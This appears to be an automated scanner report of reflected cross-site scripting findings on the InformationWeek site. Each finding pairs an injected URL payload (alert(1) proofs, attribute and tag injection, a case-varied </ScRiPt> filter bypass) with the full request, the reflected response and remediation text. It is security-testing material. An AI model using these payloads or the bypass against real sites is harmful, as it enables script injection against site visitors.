HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:59 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:59 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30645
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... cr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/81784308001f1f7c</script>f9d4966ec8a;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=974634126;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1024'-alert(1)-'c072496dd61 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaperf1024'-alert(1)-'c072496dd61/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:35 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:35 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 29918
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/whitepaperf1024'-alert(1)-'c072496dd61/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=365046991;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e48"><script>alert(1)</script>e51799a371e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /44e48"><script>alert(1)</script>e51799a371e/Security HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:32 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:32 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30148
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/44e48"><script>alert(1)</script>e51799a371e/Security;kvarticleid=;kvauthor=;loc=300;grp=163438567" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21fe1'-alert(1)-'9978f316c90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /21fe1'-alert(1)-'9978f316c90/Security HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:33 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:33 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 29918
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/21fe1'-alert(1)-'9978f316c90/Security;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=689967437;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6379a</ScRiPt%20>7a0640fd116 was submitted in the REST URL parameter 2. This input was echoed as 6379a</ScRiPt >7a0640fd116 in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /whitepaper/Security6379a</ScRiPt%20>7a0640fd116 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:43 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:43 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30071
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security6379a</ScRiPt >7a0640fd116;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=44204016;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b993"%20a%3db%2035613460ad1 was submitted in the REST URL parameter 2. This input was echoed as 9b993" a=b 35613460ad1 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/9b993"%20a%3db%2035613460ad1/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:42 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:42 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30521
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/9b993" a=b 35613460ad1/Attacks-Breaches/secure-managed-web;kvarticleid=;kvauthor=;loc=300;grp=423427692" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15d8b</script><img%20src%3da%20onerror%3dalert(1)>15c1a020ad3 was submitted in the REST URL parameter 2. This input was echoed as 15d8b</script><img src=a onerror=alert(1)>15c1a020ad3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/15d8b</script><img%20src%3da%20onerror%3dalert(1)>15c1a020ad3/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:53 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:53 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30583
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/15d8b</script><img src=a onerror=alert(1)>15c1a020ad3/Atta;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=560753103;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f005c</ScRiPt%20><a%20b%3dc>e07f4c8aa0f was submitted in the REST URL parameter 3. This input was echoed as f005c</ScRiPt ><a b=c>e07f4c8aa0f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /whitepaper/Security/Attacks-Breachesf005c</ScRiPt%20><a%20b%3dc>e07f4c8aa0f/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:13 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:13 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30557
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... +'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breachesf005c</ScRiPt ><a b=c>e07f4c8aa0f;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=344916633;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55b72"><a>24c8982aa70 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/Security/Attacks-Breaches55b72"><a>24c8982aa70/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:56 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:56 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30529
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breaches55b72"><a>24c8982aa70/secure-mana;kvarticleid=;kvauthor=;loc=300;grp=601344112" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8b23"%20a%3db%208ae27ed0b39 was submitted in the REST URL parameter 4. This input was echoed as d8b23" a=b 8ae27ed0b39 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/Security/Attacks-Breaches/d8b23"%20a%3db%208ae27ed0b39 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:23 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:23 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30273
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breaches/d8b23" a=b 8ae27ed0b39;kvarticleid=;kvauthor=;loc=300;grp=163715225" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43ccc'-alert(1)-'7429a857bd4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Attacks-Breaches/43ccc'-alert(1)-'7429a857bd4 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:28 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:28 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30349
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... 'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breaches/43ccc'-alert(1)-'7429a857bd4;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=910705214;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f358</script><a>c4d21d8c569 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security3f358</script><a>c4d21d8c569/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:57 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:57 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30535
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security3f358</script><a>c4d21d8c569/Attacks-Breaches/the-;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=45219523;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3853"><script>alert(1)</script>b69cdab5fb0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /whitepaper/Securityb3853"><script>alert(1)</script>b69cdab5fb0/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:53 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:53 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30603
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Securityb3853"><script>alert(1)</script>b69cdab5fb0/Attack;kvarticleid=;kvauthor=;loc=300;grp=551711504" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e83b1'-alert(1)-'f2966d07a86 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Attacks-Breachese83b1'-alert(1)-'f2966d07a86/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:17 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:17 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30525
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... +'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breachese83b1'-alert(1)-'f2966d07a86/the-;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=965754253;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7429"><a%20b%3dc>eb3a5f3be23 was submitted in the REST URL parameter 3. This input was echoed as c7429"><a b=c>eb3a5f3be23 in the application's response.
